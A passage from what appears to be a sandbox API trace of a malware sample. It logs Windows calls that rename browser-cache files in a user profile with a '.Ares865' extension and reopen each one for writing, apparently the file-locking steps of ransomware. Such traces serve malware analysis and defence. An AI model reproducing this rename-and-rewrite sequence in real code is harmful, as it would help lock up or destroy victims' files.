Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js.ares865"), dwFlags=0x1) returned 1 [0096.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.202] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28437) returned 1 [0096.206] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm.Ares865") returned 117 [0096.206] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm.ares865"), dwFlags=0x1) returned 1 [0096.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\browser[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\browser[1].htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2806) returned 1 [0096.210] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css.Ares865") returned 118 [0096.210] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css.ares865"), dwFlags=0x1) returned 1 [0096.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19928) returned 1 [0096.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0.Ares865") returned 122 [0096.217] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0.ares865"), dwFlags=0x1) returned 1 [0096.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=117238) returned 1 [0096.228] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif.Ares865") returned 117 [0096.228] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif.ares865"), dwFlags=0x1) returned 1 [0096.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43) returned 1 [0096.235] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css.Ares865") returned 114 [0096.235] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css.ares865"), dwFlags=0x1) returned 1 [0096.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\core[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\core[1].css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.236] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=168777) returned 1 [0096.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini.Ares865") returned 114 [0096.250] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0096.252] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.253] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0096.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot.Ares865") returned 123 [0096.258] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot.ares865"), dwFlags=0x1) returned 1 [0096.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.260] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10812) returned 1 [0096.266] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif.Ares865") returned 116 [0096.266] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif.ares865"), dwFlags=0x1) returned 1 [0096.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.268] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43) returned 1 [0096.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt.Ares865") returned 128 [0096.271] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt.ares865"), dwFlags=0x1) returned 1 [0096.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.272] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=151081) returned 1 [0096.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm.Ares865") returned 119 [0096.287] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm.ares865"), dwFlags=0x1) returned 1 [0096.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\eula_text[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\eula_text[1].htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63733) returned 1 [0096.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt.Ares865") returned 111 [0096.296] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt.ares865"), dwFlags=0x1) returned 1 [0096.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13518) returned 1 [0096.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].Ares865") returned 249 [0096.302] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].ares865"), dwFlags=0x1) returned 1 [0096.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4692) returned 1 [0096.308] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" [0096.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1].Ares865") returned 124 [0096.309] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1].ares865"), dwFlags=0x1) returned 1 [0096.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.310] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=236865) returned 1 [0096.535] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js.Ares865") returned 117 [0096.536] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js.ares865"), dwFlags=0x1) returned 1 [0096.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.543] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11979) returned 1 [0096.547] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png.Ares865") returned 117 [0096.547] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png.ares865"), dwFlags=0x1) returned 1 [0096.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=309) returned 1 [0096.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png.Ares865") returned 117 [0096.552] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png.ares865"), dwFlags=0x1) returned 1 [0096.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.553] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=654) returned 1 [0096.557] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: 